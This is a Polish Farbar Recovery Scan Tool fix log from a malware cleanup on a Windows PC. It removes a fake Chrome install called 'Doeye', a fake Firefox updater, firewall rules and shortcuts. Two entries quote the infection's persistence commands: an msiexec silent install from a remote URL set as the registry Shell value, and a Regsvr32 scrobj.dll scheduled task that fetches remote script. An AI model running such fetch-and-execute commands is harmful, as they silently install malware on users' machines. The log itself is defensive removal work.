Rezultat naprawy Farbar Recovery Scan Tool (x64) Wersja: 26-04-2017
Uruchomiony przez monic (26-04-2017 16:33:56) Run:1
Uruchomiony z C:\Users\monic\Downloads
Załadowane profile: monic (Dostępne profile: monic)
Tryb startu: Normal
==============================================

fixlist - zawartość:
*****************
CloseProcesses:
CreateRestorePoint:
HKU\S-1-5-21-371738369-586191522-401486134-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj8dNkY2OTw1MTMcNjZLFjqdMTLSNWY4NdU8RWw4FkUcFc== /q
IFEO\taskmgr.exe: [Debugger] 
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
HKU\S-1-5-21-371738369-586191522-401486134-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Doeye\Application\chrome.exe (Google Inc.) <==== UWAGA
RemoveDirectory: C:\Program Files (x86)\Doeye
RemoveDirectory: C:\Users\monic\AppData\Local\Doeye
R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [108208 2017-04-25] () <==== UWAGA
RemoveDirectory: C:\Program Files (x86)\Firefox
RemoveDirectory: C:\Users\monic\AppData\Roaming\Firefox
RemoveDirectory: C:\Users\monic\AppData\LocalLow\Mozilla
RemoveDirectory: C:\Users\monic\AppData\Local\Firefox
R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X]
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
HKU\S-1-5-21-371738369-586191522-401486134-1001\...\ChromeHTML: -> C:\Program Files (x86)\Doeye\Application\chrome.exe (Google Inc.) <==== UWAGA
Task: {C5EE9E09-5CBF-4EE4-93F9-8B35118FB45D} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj8dNkY2OTw1MTMcNjZLFjqdMTLSNWY4NdU8RWw4FkUcFc== scrobj.dll
C:\Users\monic\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
C:\Users\monic\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
C:\Users\Public\Desktop\Google Chrome.lnk
FirewallRules: [{2CDFE13B-4291-4ECE-9150-EE5582884422}] => (Allow) C:\Program Files (x86)\Doeye\Application\chrome.exe
FirewallRules: [{21F23E99-1CBA-44A9-AF05-F78F7A3D6E7C}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{396E9080-41DF-42AF-A767-59D0DD3E1217}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
C:\Users\monic\Desktop\GIMP 2.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
C:\Users\Public\Desktop\Mozilla Firefox.lnk
EmptyTemp:
*****************

Procesy zostały pomyślnie zamknięte.